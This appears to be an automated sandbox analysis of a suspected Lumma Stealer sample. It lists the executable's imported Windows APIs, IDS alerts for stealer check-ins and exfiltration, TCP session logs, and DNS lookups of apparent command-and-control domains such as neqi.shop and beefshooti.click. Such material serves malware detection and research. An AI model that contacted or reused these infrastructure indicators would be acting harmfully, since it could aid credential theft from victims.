                                                                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-24T08:18:44.441343+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649800104.21.18.185443TCP
                                                                                        2024-12-24T08:18:45.185987+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649800104.21.18.185443TCP
                                                                                        2024-12-24T08:18:45.185987+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649800104.21.18.185443TCP
                                                                                        2024-12-24T08:18:46.528423+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649804104.21.18.185443TCP
                                                                                        2024-12-24T08:18:47.296491+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649804104.21.18.185443TCP
                                                                                        2024-12-24T08:18:47.296491+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649804104.21.18.185443TCP
                                                                                        2024-12-24T08:18:48.858808+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649816104.21.18.185443TCP
                                                                                        2024-12-24T08:18:49.805687+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649816104.21.18.185443TCP
                                                                                        2024-12-24T08:18:51.034060+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649823104.21.18.185443TCP
                                                                                        2024-12-24T08:18:53.265297+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649829104.21.18.185443TCP
                                                                                        2024-12-24T08:18:55.689052+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649835104.21.18.185443TCP
                                                                                        2024-12-24T08:18:57.676428+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649841104.21.18.185443TCP
                                                                                        2024-12-24T08:19:00.437287+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649847104.21.18.185443TCP
                                                                                        2024-12-24T08:19:04.035566+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649859104.21.18.185443TCP
                                                                                        2024-12-24T08:19:05.111929+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649859104.21.18.185443TCP
                                                                                        2024-12-24T08:19:06.653357+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649865172.67.169.205443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 24, 2024 08:18:43.220890999 CET49800443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:43.220942020 CET44349800104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:43.221010923 CET49800443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:43.224003077 CET49800443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:43.224018097 CET44349800104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:44.441257000 CET44349800104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:44.441343069 CET49800443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:44.442938089 CET49800443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:44.442962885 CET44349800104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:44.443207979 CET44349800104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:44.485488892 CET49800443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:44.495084047 CET49800443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:44.495167971 CET49800443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:44.495208025 CET44349800104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:45.186012983 CET44349800104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:45.186099052 CET44349800104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:45.186144114 CET49800443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:45.243140936 CET49800443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:45.243172884 CET44349800104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:45.316679955 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:45.316735029 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:45.316808939 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:45.317104101 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:45.317123890 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:46.528326035 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:46.528423071 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:46.530225992 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:46.530240059 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:46.530493021 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:46.531789064 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:46.531896114 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:46.531924963 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.296493053 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.296540022 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.296561003 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.296592951 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.296596050 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.296607971 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.296637058 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.296643019 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.296689034 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.296705008 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.311290026 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.311357975 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.311369896 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.319664001 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.319729090 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.319739103 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.376111984 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.416131020 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.470089912 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.470113039 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.492091894 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.492177963 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.492197037 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.492312908 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.492563963 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.492572069 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.500260115 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.500564098 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.500639915 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.500641108 CET49804443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.500658989 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.500669956 CET44349804104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.643604040 CET49816443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.643699884 CET44349816104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:47.646991014 CET49816443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.647361994 CET49816443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:47.647402048 CET44349816104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:48.858730078 CET44349816104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:48.858808041 CET49816443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:48.859914064 CET49816443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:48.859945059 CET44349816104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:48.860174894 CET44349816104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:48.861320972 CET49816443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:48.861481905 CET49816443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:48.861529112 CET44349816104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:49.805654049 CET44349816104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:49.805732012 CET44349816104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:49.805979013 CET49816443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:49.806112051 CET49816443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:49.806134939 CET44349816104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:49.820642948 CET49823443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:49.820694923 CET44349823104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:49.820820093 CET49823443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:49.822876930 CET49823443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:49.822895050 CET44349823104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:51.033982038 CET44349823104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:51.034060001 CET49823443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:51.035296917 CET49823443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:51.035310984 CET44349823104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:51.035579920 CET44349823104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:51.037015915 CET49823443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:51.037159920 CET49823443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:51.037200928 CET44349823104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:51.037272930 CET49823443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:51.083328962 CET44349823104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:51.974836111 CET44349823104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:51.974934101 CET44349823104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:51.975090981 CET49823443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:51.975233078 CET49823443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:51.975246906 CET44349823104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:52.050298929 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:52.050329924 CET44349829104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:52.050875902 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:52.051243067 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:52.051255941 CET44349829104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:53.265224934 CET44349829104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:53.265296936 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:53.266844034 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:53.266858101 CET44349829104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:53.267154932 CET44349829104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:53.268456936 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:53.268623114 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:53.268660069 CET44349829104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:53.268826962 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:53.268836021 CET44349829104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:54.202538967 CET44349829104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:54.202671051 CET44349829104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:54.203023911 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:54.203023911 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:54.474679947 CET49835443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:54.474744081 CET44349835104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:54.474818945 CET49835443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:54.475199938 CET49835443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:54.475219011 CET44349835104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:54.501132965 CET49829443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:54.501163960 CET44349829104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:55.688980103 CET44349835104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:55.689052105 CET49835443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:55.690326929 CET49835443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:55.690340042 CET44349835104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:55.690573931 CET44349835104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:55.691766977 CET49835443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:55.691873074 CET49835443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:55.691900969 CET44349835104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:56.440589905 CET44349835104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:56.440712929 CET44349835104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:56.440778017 CET49835443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:56.440948963 CET49835443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:56.440968990 CET44349835104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:56.462115049 CET49841443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:56.462162018 CET44349841104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:56.462297916 CET49841443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:56.462726116 CET49841443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:56.462742090 CET44349841104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:57.676336050 CET44349841104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:57.676428080 CET49841443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:57.678247929 CET49841443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:57.678260088 CET44349841104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:57.678592920 CET44349841104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:57.680411100 CET49841443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:57.680577993 CET49841443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:57.680584908 CET44349841104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:58.738760948 CET44349841104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:58.738862991 CET44349841104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:58.738997936 CET49841443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:58.739094019 CET49841443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:58.739137888 CET44349841104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:59.223547935 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:59.223607063 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:18:59.223681927 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:59.224208117 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:18:59.224225998 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.437217951 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.437287092 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.438694000 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.438703060 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.438930035 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.440170050 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.440917969 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.440954924 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.441076040 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.441109896 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.441205978 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.441232920 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.441346884 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.441378117 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.441525936 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.441555977 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.441677094 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.441704035 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.441715956 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.441729069 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.441838980 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.441864014 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.441890955 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.442003012 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.442034006 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.487333059 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.487497091 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.487544060 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.487581015 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.531325102 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:00.531439066 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:00.579338074 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:02.780935049 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:02.781058073 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:02.781162977 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:02.781388998 CET49847443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:02.781409979 CET44349847104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:02.821737051 CET49859443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:02.821768999 CET44349859104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:02.821870089 CET49859443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:02.822196007 CET49859443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:02.822207928 CET44349859104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:04.035487890 CET44349859104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:04.035566092 CET49859443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:04.037038088 CET49859443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:04.037051916 CET44349859104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:04.037278891 CET44349859104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:04.038485050 CET49859443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:04.038501978 CET49859443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:04.038547039 CET44349859104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:05.111936092 CET44349859104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:05.112061977 CET44349859104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:05.112117052 CET49859443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:05.112266064 CET49859443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:05.112282991 CET44349859104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:05.112333059 CET49859443192.168.2.6104.21.18.185
                                                                                        Dec 24, 2024 08:19:05.112338066 CET44349859104.21.18.185192.168.2.6
                                                                                        Dec 24, 2024 08:19:05.425771952 CET49865443192.168.2.6172.67.169.205
                                                                                        Dec 24, 2024 08:19:05.425842047 CET44349865172.67.169.205192.168.2.6
                                                                                        Dec 24, 2024 08:19:05.425976038 CET49865443192.168.2.6172.67.169.205
                                                                                        Dec 24, 2024 08:19:05.426440954 CET49865443192.168.2.6172.67.169.205
                                                                                        Dec 24, 2024 08:19:05.426456928 CET44349865172.67.169.205192.168.2.6
                                                                                        Dec 24, 2024 08:19:06.653275967 CET44349865172.67.169.205192.168.2.6
                                                                                        Dec 24, 2024 08:19:06.653357029 CET49865443192.168.2.6172.67.169.205
                                                                                        Dec 24, 2024 08:19:06.654995918 CET49865443192.168.2.6172.67.169.205
                                                                                        Dec 24, 2024 08:19:06.655019045 CET44349865172.67.169.205192.168.2.6
                                                                                        Dec 24, 2024 08:19:06.655544043 CET44349865172.67.169.205192.168.2.6
                                                                                        Dec 24, 2024 08:19:06.657155991 CET49865443192.168.2.6172.67.169.205
                                                                                        Dec 24, 2024 08:19:06.699330091 CET44349865172.67.169.205192.168.2.6
                                                                                        Dec 24, 2024 08:19:10.234527111 CET44349865172.67.169.205192.168.2.6
                                                                                        Dec 24, 2024 08:19:10.234603882 CET44349865172.67.169.205192.168.2.6
                                                                                        Dec 24, 2024 08:19:10.234766006 CET49865443192.168.2.6172.67.169.205
                                                                                        Dec 24, 2024 08:19:10.235302925 CET49865443192.168.2.6172.67.169.205
                                                                                        Dec 24, 2024 08:19:10.235302925 CET49865443192.168.2.6172.67.169.205
                                                                                        Dec 24, 2024 08:19:10.235333920 CET44349865172.67.169.205192.168.2.6
                                                                                        Dec 24, 2024 08:19:10.235343933 CET44349865172.67.169.205192.168.2.6
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 24, 2024 08:18:11.230935097 CET5675553192.168.2.61.1.1.1
                                                                                        Dec 24, 2024 08:18:11.463063002 CET53567551.1.1.1192.168.2.6
                                                                                        Dec 24, 2024 08:18:18.162810087 CET5016353192.168.2.61.1.1.1
                                                                                        Dec 24, 2024 08:18:42.905926943 CET6432653192.168.2.61.1.1.1
                                                                                        Dec 24, 2024 08:18:43.212152004 CET53643261.1.1.1192.168.2.6
                                                                                        Dec 24, 2024 08:19:05.115812063 CET5818153192.168.2.61.1.1.1
                                                                                        Dec 24, 2024 08:19:05.424583912 CET53581811.1.1.1192.168.2.6
                                                                                        Dec 24, 2024 08:19:10.254894018 CET5693253192.168.2.61.1.1.1
                                                                                        Dec 24, 2024 08:19:10.476272106 CET53569321.1.1.1192.168.2.6
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 24, 2024 08:18:11.230935097 CET192.168.2.61.1.1.10x453fStandard query (0)jIjmPxXivVpjpLDcixRH.jIjmPxXivVpjpLDcixRHA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:18:18.162810087 CET192.168.2.61.1.1.10x791aStandard query (0)tse1.mm.bing.netA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:18:42.905926943 CET192.168.2.61.1.1.10x9179Standard query (0)beefshooti.clickA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:19:05.115812063 CET192.168.2.61.1.1.10xf293Standard query (0)neqi.shopA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 08:19:10.254894018 CET192.168.2.61.1.1.10xf5d1Standard query (0)klipcatepiu0.shopA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 24, 2024 08:18:11.463063002 CET1.1.1.1192.168.2.60x453fName error (3)jIjmPxXivVpjpLDcixRH.jIjmPxXivVpjpLDcixRHnonenoneA (IP address)IN (0x0001)false
